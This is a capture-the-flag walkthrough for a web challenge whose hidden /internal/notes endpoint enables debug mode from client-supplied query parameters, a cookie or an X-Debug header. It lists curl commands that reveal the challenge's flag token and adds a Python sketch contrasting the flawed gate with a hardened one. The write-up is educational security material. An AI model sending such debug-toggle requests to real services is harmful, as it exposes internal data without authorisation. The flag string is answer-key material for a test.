Blind Trust - TOKEN4
Base URL: http://nebula:5000
Background
The /internal/notes endpoint contains debug information but requires
“Debug Mode” to be enabled. Debug mode is toggled entirely by client-supplied
input: the endpoint accepts query parameters, a cookie, and a custom header.
From Nothing to Working
Start point: the /help page documents /internal/notes and mentions
“Use set_debug URI to enable functionality.”
Iterations:
- Access /internal/notes directly to confirm the endpoint exists.
- Try common debug parameters: ?debug=1, ?set_debug=1, ?mode=debug.
- Any of these parameters successfully enables debug mode.
- The response includes internal debug notes containing the token.
Goal
Enable Debug Mode and access the /internal/notes endpoint.
Command
curl -s "http://nebula:5000/internal/notes?debug=1"
Alternative triggers (all work):
# Query parameters
curl -s "http://nebula:5000/internal/notes?set_debug=1"
curl -s "http://nebula:5000/internal/notes?set_debug=true"
curl -s "http://nebula:5000/internal/notes?mode=debug"
# Cookies
curl -s "http://nebula:5000/internal/notes" -H "Cookie: debug=1"
# Custom headers
curl -s "http://nebula:5000/internal/notes" -H "X-Debug: 1"
Expected Output
Look for:
Internal Debug Notes:
TOKEN4::PCCC{BLT-h9r8WE}
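Why this works, and how to close it: the sketch below is an added example, not the challenge's server code. It models an assumed gate that trusts the request-supplied flags listed above, next to a hardened gate that only honours server-side state. The Request class and the APP_DEBUG / APP_DEBUG_TOKEN names are hypothetical.

```python
import hmac
import os
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

TRUTHY = {"1", "true"}  # values used in the write-up's curl commands

@dataclass
class Request:  # hypothetical minimal request model, not a framework class
    url: str
    headers: dict = field(default_factory=dict)  # case-sensitive here for brevity

def _cookies(req):
    raw = req.headers.get("Cookie", "")
    return dict(p.strip().split("=", 1) for p in raw.split(";") if "=" in p)

def debug_enabled_vulnerable(req):
    """Assumed shape of the flaw: any client-supplied flag turns debug on."""
    q = {k: v[-1] for k, v in parse_qs(urlsplit(req.url).query).items()}
    return (q.get("debug") in TRUTHY or q.get("set_debug") in TRUTHY
            or q.get("mode") == "debug"
            or _cookies(req).get("debug") in TRUTHY
            or req.headers.get("X-Debug") in TRUTHY)

def debug_enabled_hardened(req, env=os.environ):
    """Debug is a deployment setting plus an operator credential, never a request flag."""
    if env.get("APP_DEBUG") != "1":            # hypothetical switch, off by default
        return False
    expected = env.get("APP_DEBUG_TOKEN", "")  # hypothetical secret set out of band
    supplied = req.headers.get("Authorization", "").removeprefix("Bearer ")
    return bool(expected) and hmac.compare_digest(supplied.encode(), expected.encode())

def internal_notes(req, gate):
    # 404 rather than 403 so the endpoint does not advertise itself when debug is off.
    return (200, "Internal Debug Notes: ...") if gate(req) else (404, "Not Found")

# Constructed requests mirroring the commands on this page.
SAMPLES = [
    Request("http://nebula:5000/internal/notes?debug=1"),
    Request("http://nebula:5000/internal/notes?mode=debug"),
    Request("http://nebula:5000/internal/notes", {"Cookie": "debug=1"}),
    Request("http://nebula:5000/internal/notes", {"X-Debug": "1"}),
]

if __name__ == "__main__":
    for r in SAMPLES:
        print(internal_notes(r, debug_enabled_vulnerable)[0],
              internal_notes(r, lambda x: debug_enabled_hardened(x, {}))[0], r.url)
```

Every sample request gets 200 from the vulnerable gate and 404 from the hardened one, because nothing in the request can flip the server-side switch.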
Learn More
- https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces
- https://cwe.mitre.org/data/definitions/489.html